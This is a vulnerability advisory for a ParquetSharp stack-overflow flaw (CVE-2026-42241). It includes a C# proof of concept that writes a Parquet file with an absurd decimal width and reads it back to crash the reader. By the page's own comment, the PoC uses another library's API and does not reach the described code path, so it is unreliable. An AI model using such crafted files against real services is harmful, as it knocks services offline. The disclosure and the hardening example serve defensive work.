Security Vulnerability Report
CVE-2026-42241 CVSS 5.3 MEDIUM

CVE-2026-42241

Published: 2026-05-07 20:16:44
Last Modified: 2026-05-07 20:37:54

Description

ParquetSharp is a .NET library for reading and writing Apache Parquet files. From version 18.1.0 to before version 23.0.0.1, DecimalConverter.ReadDecimal makes a stackalloc using what might be an attacker-supplied value. If an attacker declares a decimal column with some unreasonable width, this could lead to a stack overflow. In a service environment, this would potentially take down a service. This affects applications using ParquetSharp to read untrusted Parquet files in a network service. This issue has been patched in version 23.0.0.1.
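The bug class above, as an added illustration that is not ParquetSharp's code: a decimal decoder whose scratch buffer is sized from a width read out of file metadata, beside a hardened form that bounds the width before allocating. Type and method names (DecimalReading, ReadDecimalUnbounded, ReadDecimalBounded, MaxDecimalBytes) are hypothetical.

```csharp
using System;
using System.IO;
using System.Numerics;

// Added illustration of the bug class in the description; this is not
// ParquetSharp's code and the names below are hypothetical.
public static class DecimalReading
{
    // A Parquet DECIMAL with precision <= 38 fits in 16 two's-complement
    // big-endian bytes, so no legitimate column needs a larger scratch buffer.
    public const int MaxDecimalBytes = 16;

    // Vulnerable shape: the scratch buffer is sized from a width taken from
    // file metadata, so a hostile schema chooses the stack frame size.
    public static BigInteger ReadDecimalUnbounded(ReadOnlySpan<byte> payload, int declaredWidth)
    {
        Span<byte> scratch = stackalloc byte[declaredWidth]; // attacker-controlled size
        payload.CopyTo(scratch);
        return new BigInteger(scratch, isUnsigned: false, isBigEndian: true);
    }

    // Hardened shape: reject widths outside the format's bounds before any
    // allocation, then use a constant-size buffer and sign-extend into it.
    public static BigInteger ReadDecimalBounded(ReadOnlySpan<byte> payload, int declaredWidth)
    {
        if (declaredWidth < 1 || declaredWidth > MaxDecimalBytes)
            throw new InvalidDataException(
                $"decimal width {declaredWidth} outside 1..{MaxDecimalBytes}");
        if (payload.Length != declaredWidth)
            throw new InvalidDataException("payload length does not match declared width");

        Span<byte> scratch = stackalloc byte[MaxDecimalBytes]; // fixed frame cost
        byte fill = (payload[0] & 0x80) != 0 ? (byte)0xFF : (byte)0x00; // sign extension
        scratch.Fill(fill);
        payload.CopyTo(scratch.Slice(MaxDecimalBytes - declaredWidth));
        return new BigInteger(scratch, isUnsigned: false, isBigEndian: true);
    }

    public static void Main()
    {
        // Constructed sample: 3-byte big-endian two's complement encoding of -123456.
        ReadOnlySpan<byte> sample = new byte[] { 0xFE, 0x1D, 0xC0 };
        Console.WriteLine(ReadDecimalBounded(sample, 3));
        // An absurd declared width is refused before any stack allocation happens.
        try { ReadDecimalBounded(sample, 100000); }
        catch (InvalidDataException e) { Console.WriteLine(e.Message); }
    }
}
```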

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Weakness (CWE)
CWE-789

Configurations (Affected Products)

ParquetSharp >= 18.1.0, < 23.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C#
// Note: the Parquet and Parquet.Data namespaces, ParquetWriter, ParquetReader,
// Schema and DataField<T> used here are Parquet.Net types, not ParquetSharp's,
// and DataField<decimal> has no (name, precision, scale) constructor in that
// library either. As written, this snippet therefore does not exercise
// ParquetSharp's DecimalConverter.ReadDecimal, the code path the advisory describes.
using Parquet;
using Parquet.Data;
using System;
using System.IO;

public class PoC
{
    public static void Main()
    {
        // Generate a malicious Parquet file with extremely large decimal precision.
        // This is meant to trigger the stackalloc issue in DecimalConverter.ReadDecimal.
        string filePath = "malicious.parquet";

        // Create a schema with a huge precision (e.g., 100000).
        // Note: the Parquet spec might limit this, but the vulnerability lies in how ParquetSharp handles it.
        var schema = new Schema(new DataField<decimal>("malicious_decimal", 100000, 0));

        using (var fileStream = new FileStream(filePath, FileMode.Create))
        using (var parquetWriter = new ParquetWriter(schema, fileStream))
        using (var parquetRowGroupWriter = parquetWriter.CreateRowGroup())
        {
            // Write dummy data
            parquetRowGroupWriter.WriteColumn(new decimal[] { 123.45m });
        }
        Console.WriteLine($"Malicious file created at: {filePath}");

        // Trigger the vulnerability by reading the file
        try
        {
            using (var stream = new FileStream(filePath, FileMode.Open))
            using (var reader = new ParquetReader(stream))
            {
                // This call is expected to trigger the stack overflow
                var data = reader.ReadEntireRowGroup();
                Console.WriteLine("Read successful (should not happen)");
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Exception caught: {ex.Message}");
        }
    }
}

References

https://github.com/G-Research/ParquetSharp/releases/tag/23.0.0.1
https://github.com/G-Research/ParquetSharp/security/advisories/GHSA-rrjr-v56m-ww88
